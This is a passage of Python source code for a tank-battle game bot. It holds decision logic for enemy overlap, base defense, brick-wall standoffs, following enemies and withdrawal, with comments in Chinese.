player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=3) and all( Action.is_stay(player.get_previous_action(_back)) for _back in range(1, 3+1) ) ): # 如果和一个带有跟随重叠标记的敌人僵持超过 3 回合,就把这个标记移除,因为它此时已经不是一个会和我马上打破重叠的敌人了 oppPlayer.remove_labels(Label.BREAK_OVERLAP_SIMULTANEOUSLY) # 5ce3c990d2337e01c7a54b4c if (oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY) and Action.is_shoot(player.get_previous_action(back=1)) and Action.is_shoot(oppPlayer.get_previous_action(back=1)) # TODO: 是否有必要判断射击方向相同? ): # 如果和一个带有跟随重叠标记的敌人在同一回合采用射击的方式打破重叠,则对这个行为进一步标记 oppPlayer.add_labels(Label.SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP) # # (inserted) 如果敌人带有立即打破重叠的标记,那么如果还能执行到这个地方,就意味着敌人 # 上次打破重叠的方向是回防(如果是进攻,那么应该不会再有机会遭遇) # # 那么在此处重新进入重叠的时候,尝试将对手击杀 # if not status == Status.DEFENSIVE: # 防御模式不触发? if (oppPlayer.has_label(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE) and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY) # 上回合不重叠 ): action = battler.get_next_attacking_action() if Action.is_move(action): if battler.canShoot: player.set_status(Status.READY_TO_BREAK_OVERLAP, Status.ATTEMPT_TO_KILL_ENEMY) return action + 4 # # (inserted) 观察到大多数人在遇到重叠时会选择直接无视对手,我们也可以学习一下这种决策 # 但是目前不想让这个决策成为必须,希望它只在特定的状况下被触发。 # # 对于非防御模式下,考虑这样三种情况: # ------------------------------------- # 1. 假设我方当前进攻路线距离领先一步 ,如果对方主动打破重叠,这时,如果对方下一步可以闪避, # 而我方当前回合不饿能闪避,必须要还击(之所以必须要射击是因为我们考虑最坏的情况,假设 # 对方这回合会还击,如果我方这时候不还击就会被打掉),假如对方这回合闪避了,并且恰好沿着进攻 # 方向闪避,那么结束后对方将比我方领先一步,这时候即使再继续攻击,结局也很可能是输, # 因此这步可以考虑主动打破重叠 # # 2. 假设我方当前进攻路线长度与敌方相同,假设对方主动打破重叠,假设对方可以闪避并且可以向着 # 进攻方向闪避,那么对方很有可能比我方快一步,此时应该主动打破重叠。假如对方不能向着进攻方向 # 闪避,那么认为敌人一定会还击,此时考虑我方下回合是否可以向着进攻方向闪避,如果不可以的话, # 我方就和对方差一步,处于劣势,那么就主动打破重叠。 # # 3. 假设对方比我方领先一步,这种情况下多属于对方处在我方阵营,我方很可能会触发防御模式 # 这种情况下就直接忽略掉吧 # route1 = battler.get_shortest_attacking_route() route2 = oppBattler.get_shortest_attacking_route() _shouldActiveBreakOverlap = False _enemyAttackAction = Action.STAY if route1.is_not_found() or route2.is_not_found(): # 虽然应该不可能,但是还是判断一下 pass else: _leadingLength = route2.length - route1.length # 我方领先步数 debug_print(battler, _leadingLength) action = battler.get_next_attacking_action(route1) if Action.is_shoot(action): # TODO: # 是否有必要考虑射击行为? pass elif _leadingLength == 1: # 情况一 allRoutes = oppBattler.get_all_shortest_attacking_routes() # # 由于不同的路线下一步可能会走到相同的地方,而造成的结果相同 # 因此此处将相同的行为进行缓存,为了减少判断次数 _consideredActions = set() for route in allRoutes: _enemyAttackAction = oppBattler.get_next_attacking_action(route) if _enemyAttackAction in _consideredActions: continue _consideredActions.add(_enemyAttackAction) if not Action.is_move(_enemyAttackAction): # 只考虑移动行为,因为,假如对方当前回合射击,那么我方下回合可以移动 # 这时双方距离可以认为相等,很有可能平局 continue # 提交地图模拟这步行为,这个时候双方应该均为僵持 with map_.simulate_one_action(oppBattler, _enemyAttackAction): # 考虑下回合我方是否可以闪避 with player.create_snapshot(): # 确保这种情况下决策不会再运行到这里,因为此时将不再和敌人重叠,于是不会遇到递归无终点 action, _ = player.make_decision(signal=signal) if action != battler.shoot_to(oppBattler): # 说明下回合我方可以闪避,那么就可以不管了 continue # 我方下回合不可以闪避,考虑敌人下回合是否可以闪避 with oppPlayer.create_snapshot(): action, _ = oppPlayer.make_decision() if action != oppBattler.shoot_to(battler): # 说明下回合敌人可以闪避 _shouldActiveBreakOverlap = True break elif _leadingLength == 0: # 情况二 allRoutes = oppBattler.get_all_shortest_attacking_routes() _consideredActions = set() for route in allRoutes: _enemyAttackAction = oppBattler.get_next_attacking_action(route) if _enemyAttackAction in _consideredActions: continue _consideredActions.add(_enemyAttackAction) if not Action.is_move(_enemyAttackAction): # TODO: # 仍然不考虑射击?为了防止无迭代终点? continue # 提交一步模拟,敌方应该比我方领先一步 with map_.simulate_one_action(oppBattler, _enemyAttackAction): # 考虑下回合敌方是否可以闪避 with oppPlayer.create_snapshot(): action, _ = oppPlayer.make_decision() if action != oppBattler.shoot_to(battler): # 敌方可以闪避 _shouldActiveBreakOverlap = True break # 对方下回合不可以闪避,那么考虑我方是否可以闪避 with player.create_snapshot(): action, _ = player.make_decision() # TODO: # 我方下回合可能是防御状态,这种情况下必定反击,判断不准确 # # 不过问题其实不大,因为这样就会触发主动打破重叠 # if action == battler.shoot_to(oppBattler): # 我方不能闪避 _shouldActiveBreakOverlap = True break else: # 其他情况,留作下一回合打破重叠 pass if _shouldActiveBreakOverlap: action = battler.get_next_attacking_action(route1) if Action.is_move(action): if player.is_safe_to_break_overlap_by_move(action, oppBattler): player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.KEEP_ON_MARCHING) return action elif Action.is_shoot(action): # # 假设下一步射击,考虑最糟糕的一种情况,那就是敌人同一回合主动打破重叠,移动到我方身后 # 而我方无法闪避,那么就有被敌人击杀的风险 # _mayBeKilled = False with map_.simulate_one_action(oppBattler, _enemyAttackAction): with map_.simulate_one_action(battler, action): if len(battler.try_dodge(oppBattler)) == 0: # 无法闪避! _mayBeKilled = True if not _mayBeKilled: # 在没有被击杀风险的情况下可以采用射击 return action # 是否已经有多回合僵持,应该主动打破重叠 _shouldBreakOverlap = ( battler.canShoot # 可以射击 and player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) ) # 上回合重叠这回合还重叠,就视为僵持,趁早打破重叠 if status == Status.AGGRESSIVE: # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 if not oppBattler.canShoot or _shouldBreakOverlap: # 尝试继续行军 action = battler.get_next_attacking_action() if Action.is_move(action): if _shouldBreakOverlap: # # 首先先处理主动打破重叠的情况的情况 # 该情况下会改用定制的安全性测试函数判断情况 # # TODO: # 优先尝试不往上回合已经移动过的方向移动 5ce26520d2337e01c7a3ca2b # realAction = action # # 如果遇到和我打破重叠时机一致的对手 #------------------- # 1. 尝试换一个方向移动 # 2. 如果不能换方向,那么可能在狭道内,那么退回原来的位置, # 这意味着如果敌人下回合开炮,那么他必死 5ce264c2d2337e01c7a3c9f6 # if oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY): # # 禁止的行为不一定是反向!因为可能恰好遇到拐弯 ... # 5ce48707d2337e01c7a641b7 / 5ce487a6d2337e01c7a64205 # _backTurn = 0 previousAction = Action.STAY while Action.is_stay(previousAction): # 有可能上回合是等待,也就是 _backTurn += 1 # 上回合又下方决策得到,因此需要一直回查到移动行为 previousAction = player.get_previous_action(back=_backTurn) forbiddenAction = action revertMoveAction = (previousAction + 2) % 4 # 反向移动的行为 # # 尝试移向其他的方向 # # TODO: # 太难判断了,还是暂时先禁止把 ... 鬼知道对面怎么算的距离 # '''if realAction == forbiddenAction: route1 = battler.get_shortest_attacking_route() for optionalAction in battler.get_all_valid_move_actions(): if (optionalAction == forbiddenAction or optionalAction == revertMoveAction # 不要回头 ): continue with map_.simulate_one_action(battler, optionalAction): route2 = battler.get_shortest_attacking_route() if route2.length <= route1.length: # 移动后不增加攻击距离s realAction = optionalAction break''' # # 尝试反向移动 # # TODO: # 事实上反向移动也不一定是正确的,因为每一个人对于这种情况的判断是不一样的 # 5ce4943ed2337e01c7a64cdd # '''if realAction == forbiddenAction: with map_.simulate_one_action(battler, revertMoveAction): if len(oppBattler.try_dodge(battler)) == 0: # 如果这回合他反向射击,那么必死 realAction = revertMoveAction''' # # 否则等待,让敌人开一炮,这样下回合还会继续触发移动 # 有可能换一个敌方就可以有别的决策方法 # 也有可能直接带到基地 5ce48b77d2337e01c7a644e5 # if realAction == forbiddenAction: player.set_status(Status.OVERLAP_WITH_ENEMY) # 保持等待状况 return Action.STAY if player.is_safe_to_break_overlap_by_move(realAction, oppBattler): player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.KEEP_ON_MARCHING) return realAction else: # 无法安全移动,但是又需要打破重叠,那么就视为防御 # 让后续的代码进行处理 player.remove_status(Status.AGGRESSIVE) player.set_status(Status.DEFENSIVE) pass # 这里会漏到 DEFENSIVE else: # 开始处理常规情况 realAction = player.try_make_decision(action) if Action.is_move(realAction): # 继续起那就 player.set_status(Status.KEEP_ON_MARCHING) return realAction # 否则就是等待了,打得更有侵略性一点,可以尝试向同方向开炮! realAction = player.try_make_decision(action + 4) if Action.is_shoot(realAction): player.set_status(Status.KEEP_ON_MARCHING) return realAction elif Action.is_shoot(action): # 下一步预计射击 realAction = player.try_make_decision(action) if Action.is_shoot(realAction): player.set_status(Status.KEEP_ON_MARCHING) return realAction else: # 否则停留 player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY else: player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY # 原地等待 if status == Status.DEFENSIVE or _shouldBreakOverlap: # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 if not oppBattler.canShoot or _shouldBreakOverlap: # # 这里不只思考默认的最优路径,而是将所有可能的最优路径都列举出来 # 因为默认的最优路径有可能是破墙,在这种情况下我方坦克就不会打破重叠 # 这就有可能错失防御机会 # for enemyAttackRoute in oppBattler.get_all_shortest_attacking_routes(): oppAction = oppBattler.get_next_attacking_action(enemyAttackRoute) # 模拟对方的侵略性算法 if Action.is_move(oppAction) or Action.is_shoot(oppAction): # 大概率是移动 # 主要是为了确定方向 oppAction %= 4 # 首先先检查对方是否会跟随我 #-------------------------- # 1. 如果我方可以射击,对方不能射击,那么按照之前的经验,对方下回合会移动 # 这个时候尝试击杀 # if oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY): if battler.canShoot: # 这回合可以射击,则改为射击 if (oppPlayer.has_label(Label.SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP) and oppBattler.canShoot # 如果带有这个标记,那么这回合就不要射击了,等待敌人打完这回合, ): # 下回合才有可能击杀 5ce50cd9d2337e01c7a6e45a player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY else: # 否则就考虑反身射击 player.set_status(Status.READY_TO_BREAK_OVERLAP, Status.ATTEMPT_TO_KILL_ENEMY) # 尝试击杀敌军 return oppAction + 4 else: pass # 均不能射击,那么将判定为没有风险。那就一起移动 # 正常情况下选择堵路 #---------------------- if player.is_safe_to_break_overlap_by_move(oppAction, oppBattler): # 模仿敌人的移动方向 player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.READY_TO_BLOCK_ROAD) # 认为在堵路 return oppAction # 否则等待 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY #{ END 'decision/single/overlapping.py' }# #{ BEGIN 'decision/single/base_defense.py' }# class BaseDefenseDecision(SingleDecisionMaker): """ 主动防守基地 --------------------- 现在没有和敌人正面相遇,首先先处理一种特殊情况 在敌人就要攻击我方基地的情况下,应该优先移动,而非预判击杀 这种防御性可能会带有自杀性质 若敌人当前回合正面对我方基地 ---------------------------- 1. 敌人当前回合炮弹冷却,下回合射向我方基地,如果我方坦克下一步可以拦截,那么优先移动拦截 2. 敌人当前回合可以射击,我方坦克下一步可以拦截,那么自杀性拦截 3. 敌人当前回合炮弹冷却,下回合射向我方基地,而我方坦克需要两步才能拦截,那么自杀性拦截 若敌人下一回合可以面对我方基地 ---------------------------- 1. 此时敌人必定可以射击,如果我方坦克在这一步可以优先移动到拦截的位置,那么优先移动 """ def _make_decision(self): player = self._player map_ = player._map battler = player.battler for oppBattler in [ _oppPlayer.battler for _oppPlayer in player.opponents ]: if oppBattler.destroyed: continue # # 敌人当前回合面向基地 # if oppBattler.is_face_to_enemy_base(): if oppBattler.canShoot: # 敌方可以射击 for action in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, action): if not oppBattler.is_face_to_enemy_base(): # 此时不再面向我方基地,为正确路线 player.set_status(Status.SACRIFICE_FOR_OUR_BASE) return action else: # 敌方不可射击 for action in battler.get_all_valid_move_actions(): # 敌方不能射击,我方尝试移动两步 with map_.simulate_one_action(battler, action): if not oppBattler.is_face_to_enemy_base(): # 一步防御成功 player.set_status(Status.BLOCK_ROAD_FOR_OUR_BASE) return action else: # 尝试两步拦截 if map_.is_valid_move_action(battler, action): # 需要先预判是否合理 with map_.simulate_one_action(battler, action): if not oppBattler.is_face_to_enemy_base(): # 两步拦截成功 player.set_status(Status.SACRIFICE_FOR_OUR_BASE) return action else: # # 敌人下一回合可能面向基地 # for enemyAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, enemyAction): if oppBattler.is_face_to_enemy_base(): # 敌人移动一步后面向我方基地 for action in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, action): if not oppBattler.is_face_to_enemy_base(): # 我方优先移动可以阻止 player.set_status(Status.BLOCK_ROAD_FOR_OUR_BASE) return action #{ END 'decision/single/base_defense.py' }# #{ BEGIN 'decision/single/behind_brick.py' }# class BehindBrickDecision(RespondTeamSignalDecisionMaker): """ 适用于在墙后和敌人僵持时的情况 """ HANDLED_SIGNALS = ( Signal.PREPARE_FOR_BREAK_BRICK, Signal.READY_TO_BACK_AWAY_FROM_BRICK, ) def _make_decision(self): player = self._player signal = self._signal battler = player.battler BattleTank = type(battler) # 准备破墙信号 #-------------------------- # 触发条件: # # 1. 对应于双方对峙,我方开好后路后触发某些条件强制破墙 # 2. 对方刚刚从墙后移开,我方存在后路,这个时候强制破墙 # # 收到这个信号的时候,首先检查是否可以闪避 # # 1. 如果可以闪避,就返回可以破墙的信号 # 2. 如果不可以闪避,就返回这回合准备后路的信号 # if signal == Signal.PREPARE_FOR_BREAK_BRICK: attackAction = battler.get_next_attacking_action() # 只考虑攻击路径上的敌人 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1) '''_undoRevertTurns = 0 while oppTank is None: # 对应于敌方刚离开的那种触发条件 # 可能存在多轮回滚,因为别人的策略和我们的不一样! # 给别人回滚的时候必须要考虑多回合! map_.revert() _undoRevertTurns += 1 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1)''' if oppTank is None: # # 墙后敌人并不一定处于攻击路径之后! 5ce3d1c0d2337e01c7a554e3 # 在这种情况下应该取消考虑这种情况 # res = ( Action.INVALID, Signal.UNHANDLED ) else: player.set_status(Status.WAIT_FOR_MARCHING) # 用于下回合触发 player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) # 用于下回合触发 player.set_risky_enemy(oppTank) # 重新设置这个敌人! dodgeActions = battler.try_dodge(oppTank) if len(dodgeActions) == 0: # 准备凿墙 breakBrickActions = battler.break_brick_for_dodge(oppTank) if len(breakBrickActions) == 0: # 两边均不是土墙 res = ( Action.STAY, Signal.CANHANDLED ) # 不能处理,只好等待 else: player.set_status(Status.READY_TO_PREPARE_FOR_BREAK_BRICK) res = ( breakBrickActions[0], Signal.READY_TO_PREPARE_FOR_BREAK_BRICK ) else: # 可以闪避,那么回复团队一条消息,下一步是破墙动作 shootAction = battler.shoot_to(oppTank) player.set_status(Status.READY_TO_BREAK_BRICK) res = ( shootAction, Signal.READY_TO_BREAK_BRICK ) '''for _ in range(_undoRevertTurns): map_.undo_revert()''' return res # 必定回复一个信号 # # 准备回退以制造二打一的局面 # if signal == Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK: attackAction = battler.get_next_attacking_action() # 只考虑攻击路径上的敌人 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1) if oppTank is None: # ?? res = ( Action.INVALID, Signal.UNHANDLED ) else: player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) action = battler.back_away_from(oppTank) realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.READY_TO_BACK_AWAY_FROM_BRICK) res = ( realAction, Signal.READY_TO_BACK_AWAY_FROM_BRICK ) else: # 存在风险,也就是想要夹击的敌人有炮弹,那么就先等待一回合 res = ( Action.STAY, Signal.CANHANDLED ) return res # 必定回复一个信号 #{ END 'decision/single/behind_brick.py' }# #{ BEGIN 'decision/single/follow_enemy_behind_brick.py' }# class FollowEnemyBehindBrickDecision(SingleDecisionMaker): """ 跟随墙后敌人的逻辑 ----------------- 如果上回合敌人和我方隔墙僵持,然后敌人向两侧移动,为了防止敌人从旁边的墙突破, 这里添加一个主动跟随的逻辑,假如对方这回合破墙,那么我方这回合就会出现在对方墙后, 这样对方就无法进攻,甚至可以为我方进攻创造机会 5ce57677d2337e01c7a7c1ff """ def _make_decision(self): player = self._player map_ = player._map battler = player.battler Tank2Player = type(player) BattleTank = type(battler) if (player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1) and not Action.is_move(player.get_previous_action(back=1)) ): # 上回合墙后有人 with map_.rollback_to_previous(): action = battler.get_next_attacking_action() if Action.is_stay(action): return oppTank = battler.get_enemy_behind_brick(action, interval=-1) # 找到墙后敌人 if oppTank is None: # 理论上不会存在? return oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) dodgeActions = oppBattler.try_dodge(battler) previousAction = oppPlayer.get_previous_action(back=1) if Action.is_stay(previousAction): return if previousAction in dodgeActions: # 敌人上回合从墙后闪开 realAction = player.try_make_decision(previousAction) # 尝试跟随敌人上回合的移动行为 if Action.is_move(realAction): with map_.simulate_one_action(battler, realAction): for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, BrickField): # 确保跟随后还隔着墙 5ce90a90d2337e01c7abcd07 # 否则何必要跟随 ... player.set_status(Status.READY_TO_FOLLOW_ENEMY) return realAction # # 将动作连续化,如果对方连续移动,那么可以考虑跟随 # if player.has_status_in_previous_turns(Status.READY_TO_FOLLOW_ENEMY): oppTank = None with map_.auto_undo_revert() as counter: # 有可能要多回合回滚 while map_.revert(): counter.increase() action = battler.get_next_attacking_action() if Action.is_stay(action): continue oppTank = battler.get_enemy_behind_brick(action, interval=-1) if oppTank is not None: oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) break if oppTank is not None: # 理论上一定会找到敌人 previousAction = oppPlayer.get_previous_action(back=1) lastAction = player.get_previous_action(back=1) # 上回合一定跟随移动 # 确保敌人在贴着墙移动,否则就不必继续跟随了 if np.abs(previousAction % 4 - lastAction % 4) in (0, 2): # 两次移动方向或相反 realAction = player.try_make_decision(previousAction) # 尝试跟随敌人上回合行为 if Action.is_move(realAction): with map_.simulate_one_action(battler, realAction): for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, BrickField): player.set_status(Status.READY_TO_FOLLOW_ENEMY) return realAction #{ END 'decision/single/follow_enemy_behind_brick.py' }# #{ BEGIN 'decision/single/withdrawal.py' }# class WithdrawalDecision(SingleDecisionMaker): """ 主动回撤逻辑 ------------- 如果我方大逆风,那么主动回防基地 具有一个持久性的记忆标签 KEEP_ON_WITHDRAWING 带有这个标签的 player 在决策的时候,比 WithdrawalDecision 优先级高的决策应该以 WITHDRAW 状态为优先 带有 WITHDRAW 持久标记的 player 决策必定会在此处终止,否则就要取消这个标记和状态, 让后续的决策继续进行 """ ALLOW_WITHDRAWAL = True # 一个测试用的 const,设为 False 则取消一切和 WITHDRAW 相关的决策 @CachedProperty def _GUARD_POINTS(self): """ 获得基地两个对角线位置的两个防御坐标 """ player = self._player map_ = player._map tank = player.tank side = tank.side base = map_.bases[side] _DIAGONAL_DIRECTIONS = ( (1, 1), (1, -1), (-1, 1), (-1, -1) ) x1, y1 = base.xy points = [] for dx, dy in _DIAGONAL_DIRECTIONS: x2 = x1 + dx y2 = y1 + dy if map_.in_map(x2, y2): points.append( (x2, y2) ) return points def _get_more_dangerous_guard_point(self, oppBattler): """ 更加危险的防御点,被认为是距离敌人更近的防御点 """ player = self._player battler = player.battler _GUARD_POINTS = self._GUARD_POINTS distancesToEnemy = [ oppBattler.get_manhattan_distance_to_point(x2, y2) for (x2, y2) in _GUARD_POINTS ] return _GUARD_POINTS[ np.argmin(distancesToEnemy) ] # 距离敌人更近的点根据危险性 def _is_dangerous_action(self, action, oppBattler): """ 为了防止出现这样一种情况: 5ce9154fd2337e01c7abd81f 以及这样一种情况: 5cea5d38d2337e01c7ad8418 ---------------------------------- 1. 假如我方这回合移动,而敌人下回合通过非射击行为,可以面向我方基地(射击行为的话,下回合对方炮弹冷却, 对基地暂时不造成威胁),如果我方这回合选择不移动可以阻止它,那么就选择停止 2. 假如我方这回合射击,而敌人下回合通过非射击行为,可以面向我方基地,那么就选择停止 3. 假如我方先破一墙,对方出现在后面,那么就算是有威胁 """ player = self._player battler = player.battler map_ = battler._map if (Action.is_move(action) and not oppBattler.is_face_to_enemy_base() # 事实上应该不会出现 ): # 先保存所有可能行为,为了防止模拟我方行为后,射击能力被重置 _shouldStay = False enemyAction = Action.STAY with map_.simulate_one_action(battler, action): for _action in oppBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(oppBattler, _action): if oppBattler.is_face_to_enemy_base(): # 我方执行一步后,对方面对基地 _shouldStay = True enemyAction = _action break if _shouldStay: # 现在不模拟我方行为,然后同样模拟对方行为,看对方是否面对我方基地 with map_.simulate_one_action(oppBattler, enemyAction): if not oppBattler.is_face_to_enemy_base(): return True if (Action.is_shoot(action) and not oppBattler.is_face_to_enemy_base() # 敌人上回合没有面对我方基地 ): for _action in oppBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(oppBattler, _action): if not oppBattler.is_face_to_enemy_base(): # 当敌人尚未面对我方基地 with map_.simulate_one_action(battler, action): if oppBattler.is_face_to_enemy_base(): # 我方射击一步后,敌人面对我方基地 return True # 不安全的 # 其他情况均认为安全 return False def _try_make_decision(self, action, oppBattler): """ Withdraw 下的 try_make_decision """ player = self._player Tank2Player = type(player) oppPlayer = Tank2Player(oppBattler) realAction = player.try_make_decision(action) if (Action.is_stay(realAction) and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=2) and player.has_status_in_previous_turns(Status.WAIT_FOR_WITHDRAWING, turns=2) and not Action.is_shoot(oppPlayer.get_previous_action(back=1)) and not Action.is_shoot(oppPlayer.get_previous_action(back=2)) ): # 如果等待了两回合,对方两回合均为射击那么视为安全 player.set_status(Status.FORCED_WITHDRAW) # 糟糕的设计!如果后续需要更改,那么需要在再删掉这个状态 realAction = action if (Action.is_stay(realAction) and not player.has_status(Status.FORCED_WITHDRAW) ): return Action.STAY if self._is_dangerous_action(realAction, oppBattler): player.remove_status(Status.FORCED_WITHDRAW) return Action.STAY return realAction def _get_next_action_to_guard_point(self, x2, y2, oppBattler): """ 获得趋近守卫点 (x2, y2) 的下一个行为 """ player = self._player battler = player.battler map_ = player._map base = map_.bases[battler.side] route = battler.get_route_to_point_by_move(x2, y2) assert not route.is_not_found() # 这个必定能找到路! action = battler.get_next_defensive_action(route) realAction = self._try_make_decision(action, oppBattler) if not Action.is_stay(realAction): with map_.simulate_one_action(battler, realAction): if not battler.is_closest_to(base): player.remove_status(Status.FORCED_WITHDRAW) return Action.STAY # 其实是可以确保一直停留在基地附近的? return realAction # stay/realAction def _make_decision(self): if not self.__class__.ALLOW_WITHDRAWAL: return self.__class__.UNHANDLED_RESULT player = self._player signal = self._signal map_ = player._map battler = player.battler base = map_.bases[battler.side] x2, y2 = base.xy Tank2Player = type(player) BattleTank = type(battler) oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=self.__class__.ALLOW_WITHDRAWAL) # # 首先,检查带有持久化 WITHDRAW 标签的 player # 该回合是否还需要真正的延续这个标签 # # 一种情况是考虑是否应该 # if (player.has_label(Label.KEEP_ON_WITHDRAWING) and status != Status.WITHDRAW # 实际评估不是 WITHDRAW ): strictStatus = evaluate_aggressive(battler, oppBattler, strict=True) if strictStatus == Status.AGGRESSIVE: # 假如对方上回合被击杀,那么我方大概率会触发侵略模式? player.remove_status(Status.WITHDRAW) player.remove_labels(Label.KEEP_ON_WITHDRAWING) player.set_status(status) return # 留给其他 decision 处理 # # 一种情况是考虑上回合是否击杀了一个人 # if len([ _oppPlayer for _oppPlayer in player.opponents if _oppPlayer.defeated ]) == 1: teammate = player.teammate if not teammate.defeated: # 二打一的局势,此时 oppBattler 为剩下一个敌人 teammateBattler = teammate.battler _dontWithdraw = False _deltaDistanceToEnemy = battler.get_manhattan_distance_to(oppBattler) - teammateBattler.get_manhattan_distance_to(oppBattler) if _deltaDistanceToEnemy > 0: # 我比队友距离更远 _dontWithdraw = True elif _deltaDistanceToEnemy == 0: # 一样远 _deltaDistanceToOurBase = battler.get_manhattan_distance_to(base) - teammateBattler.get_manhattan_distance_to(base) if _deltaDistanceToOurBase > 0: # 我比队友理基地更远,那么让队友防御 _dontWithdraw = True elif _deltaDistanceToOurBase == 0: # 如果还是一样远 ... if not teammate.has_label(Label.DONT_WITHDRAW): # 避免两者同时强攻,那么就让先判断的队友进行强攻 _dontWithdraw = True if _dontWithdraw: player.remove_status(Status.WITHDRAW) player.remove_labels(Label.KEEP_ON_WITHDRAWING) player.add_labels(Label.DONT_WITHDRAW) return # 留给其他 decision 处理 if status == Status.WITHDRAW or player.has_status(Status.WITHDRAW): player.remove_labels(Status.AGGRESSIVE, Status.DEFENSIVE, Status.STALEMENT) player.set_status(Status.WITHDRAW) player.add_labels(Label.KEEP_ON_WITHDRAWING) # 这个状态一旦出现,就添加标记 # # (inserted) 不要轻易从中线撤退,应该想一下是否可以堵路 # if battler.is_near_midline(offset=2): # y = [2, 6] for action in [ Action.STAY ] + battler.get_all_valid_move_actions(): # 先判断 stay with map_.simulate_one_action(battler, action): if battler.can_block_this_enemy(oppBattler): player.set_status(Status.READY_TO_BLOCK_ROAD) return action # 不需要判断安全性? # # 1. 如果上回合已经到达基地附近,那么优先移动到基地对角线的位置等待 # 2. 必要时改变守卫的位置 # # TODO: # 如果能直接到达守卫点,那应该考虑一下直接到达 ... 而不要先把基地的墙凿了 # if battler.is_closest_to(base): player.set_status(Status.GRARD_OUR_BASE) moreDangerousPoint = None _shouldMoveToDangerousPoint = False # # 已到达基地附近,但是未到达守卫点,尝试移向守卫点 # if (battler.xy not in self._GUARD_POINTS # 为处在对角线防御位置 and not player.has_status(Status.BLOCK_ROAD_FOR_OUR_BASE) # 高优先级触发 ): moreDangerousPoint = self._get_more_dangerous_guard_point(oppBattler) _shouldMoveToDangerousPoint = True # # 已经到达守卫点,判断是否需要移向另一个守卫点 # if battler.xy in self._GUARD_POINTS: distancesToEnemy = [ oppBattler.get_manhattan_distance_to_point(x2, y2) for (x2, y2) in self._GUARD_POINTS ] moreDangerousPoint = self._GUARD_POINTS[ np.argmin(distancesToEnemy) ] # 距离敌人更近的点根据危险性 _shouldMoveToDangerousPoint = True if _shouldMoveToDangerousPoint: action = self._get_next_action_to_guard_point(*moreDangerousPoint, oppBattler) if not Action.is_stay(action): player.set_status(Status.MOVE_TO_ANOTHER_GUARD_POINT) else: player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) return action player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) # 设置为等待 return Action.STAY # 其他情况下继续等待 _route1 = battler.get_shortest_defensive_route() _route2 = oppBattler.get_shortest_attacking_route() # 如果不将我视为钢墙 _route3 = oppBattler.get_shortest_attacking_route( ignore_enemies=False, bypass_enemies=True) # 如果将我视为钢墙 # TODO: # 如果 route2 和 route3 距离差很大,那么可以选择不动 # if _route2.is_not_found() or _route3.is_not_found(): # 对方找不到进攻路线,那就相当于我方把路堵住了? return Action.STAY assert not _route1.is_not_found() # 这个不可能的吧 allowedDelay = _route2.length - (_route1.length - 2) # 我方防御路线比地方进攻路线领先值 allowedDelay -= 1 # 至少要快一步 if allowedDelay < 0: allowedDelay = 0 returnAction = Action.INVALID with outer_label() as OUTER_BREAK: for route in sorted( battler.get_all_shortest_defensive_routes(delay=allowedDelay), key=lambda route: estimate_route_blocking(route) ): # 阻塞程度最小的优先 action = battler.get_next_defensive_action(route) if Action.is_stay(action) and battler.is_closest_to(base): # 到达基地就等待了 returnAction = action raise OUTER_BREAK realAction = self._try_make_decision(action, oppBattler) if Action.is_stay(realAction): # 尽量找一条不是停留的路? player.remove_status(Status.FORCED_WITHDRAW) continue returnAction = realAction raise OUTER_BREAK if not Action.is_valid(returnAction): # 没有一个合适的行为? action = battler.get_next_defensive_action(_route1) # 那就随便来一个把 ... returnAction = self._try_make_decision(action, oppBattler) if Action.is_move(returnAction) or Action.is_shoot(returnAction): player.set_status(Status.READY_TO_WITHDRAW) else: # stay if battler.is_closest_to(base): player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) else: if player.get_risky_enemy() is not None: # 存在风险敌人就能判定是因为敌人阻挡? player.set_status(Status.WAIT_FOR_WITHDRAWING) player.set_status(Status.PREVENT_BEING_KILLED) return returnAction #{ END 'decision/single/withdrawal.py' }# #{ BEGIN 'decision/single/active_defense.py' }# class ActiveDefenseDecision(SingleDecisionMaker): """ 主动防御策略 ----------------------- 不要追击敌人,而是选择保守堵路策略! 1. 对于路线差为 2 的情况,选择堵路,而非重叠 2. 